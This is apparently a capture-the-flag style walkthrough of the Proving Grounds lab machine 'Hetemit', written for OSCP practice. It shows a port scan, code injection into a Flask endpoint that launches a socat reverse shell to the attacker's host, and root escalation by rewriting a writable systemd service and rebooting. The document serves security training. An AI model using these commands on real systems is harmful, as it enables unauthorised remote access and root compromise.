Proving grounds:Hetemit
3 min readOct 30, 2022
Today we will take a look at Proving grounds: Hetemit. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.49.250
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 b1:e2:9d:f1:f8:10:db:a5:aa:5a:22:94:e8:92:61:65 (RSA)
|_ 256 48:bc:9d:eb:bd:4d:ac:b3:0b:5d:67:da:56:54:2b:a0 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos))
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
18000/tcp open biimenu?
50000/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.8)- Wekzeug (50000)
┌──(root㉿kali)-[~/ctf]
└─# curl -X POST http://192.168.250.117:50000/verify — data “code=2*2”
4└─# curl -X POST http://192.168.250.117:50000/verify --data "code=os.system('socat TCP:192.168.49.250:80 EXEC:sh')"
Cmeeks
└─# nc -nvlp 80
listening on [any] 80 …
connect to [192.168.49.250] from (UNKNOWN) [192.168.250.117] 34912
python3 -c ‘import pty;pty.spawn(“/bin/bash”);’
[cmeeks@hetemit restjson_hetemit]$ whoami
whoami
cmeeks
[cmeeks@hetemit restjson_hetemit]$- Privesc
[cmeeks@hetemit restjson_hetemit]$ find /etc -type f -writable 2> /dev/null
find /etc -type f -writable 2> /dev/null
/etc/systemd/system/pythonapp.service[cmeeks@hetemit restjson_hetemit]$ sudo -l
sudo -l
User cmeeks may run the following commands on hetemit:
(root) NOPASSWD: /sbin/halt, /sbin/reboot, /sbin/poweroff
[cmeeks@hetemit restjson_hetemit]$ cat exploit.sh
cat exploit.sh
#!/bin/bash
socat TCP:192.168.49.250:18000 EXEC:sh[cmeeks@hetemit restjson_hetemit]$ chmod +x exploit.sh[cmeeks@hetemit restjson_hetemit]$ pwd
pwd
/home/cmeeks/restjson_hetemitBefore
[cmeeks@hetemit restjson_hetemit]$ cat /etc/systemd/system/pythonapp.service
cat /etc/systemd/system/pythonapp.service
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=cmeeks
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failureAfter
[cmeeks@hetemit restjson_hetemit]$ cat /etc/systemd/system/pythonapp.service
[Unit]
Description=Python App
After=network-online.target[Service]
Type=simple
ExecStart=/home/cmeeks/restjson_hetemit/exploit.sh
TimeoutSec=30
RestartSec=15s
User=root
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure[Install]
WantedBy=multi-user.target[cmeeks@hetemit restjson_hetemit]$ sudo reboot
Listen
└─# nc -nvlp 18000
listening on [any] 18000 …A few seconds later└─# nc -nvlp 18000
listening on [any] 18000 ...
connect to [192.168.49.250] from (UNKNOWN) [192.168.250.117] 55606
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux hetemit 4.18.0-193.28.1.el8_2.x86_64 #1 SMP Thu Oct 22 00:20:22 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
